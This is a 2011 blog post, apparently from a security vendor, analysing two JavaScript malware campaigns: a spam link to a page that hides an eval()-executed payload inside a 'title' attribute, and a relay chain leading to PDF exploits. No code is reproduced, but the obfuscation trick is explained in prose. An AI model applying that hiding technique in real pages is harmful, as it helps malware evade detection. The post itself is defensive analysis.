New JavaScript Tricks from the Bad Guys / An Archaeologist at Work

December 12, 2011 - By Chris Larsen

[This article is a combination of two posts from our internal security blog: one from last month when I was on the road, and one from this month that looks back at a different attack from the same time period. The common thread is the never-ending creativity of the Bad Guys in coming up with new ways to abuse JavaScript in cloaking their attacks...]

ATTACK #1 (New JavaScript Trick):

Normally, security-aware computer geeks teach their friends and family to delete spammy- or malicious-looking e-mails without opening them (or at least not to click on the links or attachments). Malware researchers, however, ask to have those e-mails forwarded to their honeypot accounts for analysis...

So today [Nov 10] I got an interesting present to unwrap:

screenshot of malicious spam

The "Word Document" was actually just a simple HTTP link, to a hacked site ( that was hosting malicious HTML pages in several newly-created subdirectories -- we'd already collected four samples in our malware database:


Clicking on the link in the e-mail retrieves the following small HTML page:

screenshot of malware page code


(One of the three hacked sites has already detected and removed the injected js.js file, so it gets to remain anonymous. You other two need to get cleaned up!)

The js.js file does not get us to the good bit just yet. Instead, it serves a simple relay link to the actual malware page, via the following single line of code:


The domain was auto-detected by WebPulse's famous Background Checker module and flagged as a malware domain -- about 19 hours before I wrote this [i.e., the original] blog post.

Its payload is quite interesting (as obfuscated script usually is), and worth a look...

screenshot of obfuscated script


The key points are highlighted: create an element with a particular "id=" value, and an interesting "title=" string (more on that in a moment); then have a small function that looks for that element by its "id", find its "title", and then "splits" that title into numeric chunks wherever there's an 'n' character. Finally, it assembles a payload string from those chunks, and executes it with an eval() call. (That "title=" string is a whopping 88,920 characters long, by the way -- wowza! -- with every 3rd character the aforementioned 'n'.)

Writing this from the road, I don't have the time/tools to work completely through the script, but it produces a large blob of densely packed (and moderately obscured) Javascript that is clearly malicious -- set to check the installed versions of the OS, the Browser, and various Plugins...


Since I didn't recall ever seeing the trick of using an item's "title" attribute to host an obfuscated payload before (disclaimer: I don't spend a lot of time reverse-engineering malicious Javascript on a daily basis), I was curious to see how well this page was detected. So I submitted a copy of the malicious Web page (saved as a straightforward HTML file) to VirusTotal, and none of the 43 engines detected it as malicious. Not so good.

I also submitted the actual URL to the bank of 16 URL detectors in VT, and this time had a little better luck: 2 out of 16 detectors classified it as malicious. However, a bit of experimentation showed that they were not analyzing the Javascript, but were simply keying on the malicious domain name (i.e., it was in their databases, as it was in ours).


ATTACK #2 (An Archaeologist at Work):

One of our VLC's (Very Large Customers) asked me a couple of weeks ago to comment on a particular attack. They were nice enough to include a link to a security blog (dated 11/02) that included a breakdown of the attack. The blog post is well worth a read, since the Bad Guys came up with yet another cool way to abuse Javascript (hiding the obfuscated payload string in a parameter to a non-existant URL)...

Normally, we don't like to go on "archaeology expeditions" into logs that are over a month old, but this one seemed to be worth a try, since there were three specific items in the write-up that I could research:

(1) the relay site: (injected via the clever jscript technique)
(2) (named as a sort of second-stage relay)
(3) (named as the exploit host)


For (1), our logs show the attack beginning on 10/25, and running through 11/01 (possibly later, but the summary logs didn't show it after that, and I didn't have time to dig into the detailed logs). I did some searching on Google, and it appears that 11/01-11/02 is the timeframe that the security industry in general became aware of this domain and the attack. (Note that this site was not actually "attacking"; it was only doing "unarmed reconnaissance" like an analytics site might -- i.e., seeing what browser you were using, and what plug-ins/add-ons it had -- before forwarding you on to the real exploit kits. In other words, the Bad Guys had taken some pains to cover their tracks; after all, if this injection had simply been a link to a malware site, the site would have been picked up a lot sooner; this way they kept a low profile for several days.)


For (2), the story is much more interesting, as this is the stage I'd expect us to start catching things. The server at came into use on 10/31, serving a domain called (and only that domain). This domain was in use for about four hours. (Interestingly, the first hour it appears to have not been functional -- returning 404s.)

WebPulse recognized very early that was a domain it hadn't seen before, and about an hour and a half after the first URL showed up in the logs, it had completed its DNA match on the server hosting it, and linked that server to a known malnet that it had been tracking for over two weeks. From that point on, it returned ratings of "Malware" for all requests for The same server also hosted two other attack domains that day: and -- which we also flagged in real-time as Malware. (The server continued to be active as a malware host for a couple of weeks, hosting several more attack domains before it went dormant. WebPulse flagged all of these requests as Malware.)

Notably, the server at had several sibling servers (located at a variety of other IP addresses) in the weeks leading up to the attack. We had identified this malnet on 10/13 -- all domains on any of the servers should have been flagged as Malware by WebPulse from that point on. (Although in the edge case of a completely new domain on a completely new server -- like -- it may take WebPulse an hour or so to do a conclusive DNA analysis and identify the new server as a sibling to the ones it already knows about.)


For (3), it's a small piece of a very incomplete picture. My logs show that was active for precisely 24 hours (midnight to midnight) on 10/31. Further, it was only serving one specific PDF exploit -- one that was dynamically flagged as Suspicious by a different WebPulse module (the "Shady-PDF Detector"). That looks like this domain could only be one part of the full attack, as the attack ran for more than one day, and as it's very unlikely that all of the visitors to this attack network were only deemed susceptible to this particular vulnerability. However, piecing together the picture of sibling sites serving other exploits will necessarily be messy and incomplete this long after the attack. I did find at least three other domains that appeared to be sibling sites of (hosted on some of the same servers, and serving similar PDF exploits that were also flagged in real time as Suspicious by the Shady-PDF Detector):,, and


These two attacks highlight the challenge for "malicious script detectors" to handle new variants, since the Bad Guys are endlessly inventive at coming up with new ways to obfuscate their code and hide its run-time behavior as it re-assembles the attack code and launches it. Building defenses to recognize specific attacks can be done, but it takes continuing time and effort, and the attacks are often over (or substantially modified) before a specific defense is ready. In our experience, a defense that focuses on identifying malicious sites, and tracking the malnets that spawn them, is superior.

We've put quite a bit of effort into identifying important attack elements like exploit kits, and the fact that we were able to identify a major component of this attack network on 10/13, twelve days before the " attack" began on 10/25, is pretty good evidence that it works. Being able to auto-identify the new server in this attack within 90 minutes of its birth, and begin auto-blocking its domains, is pretty cool.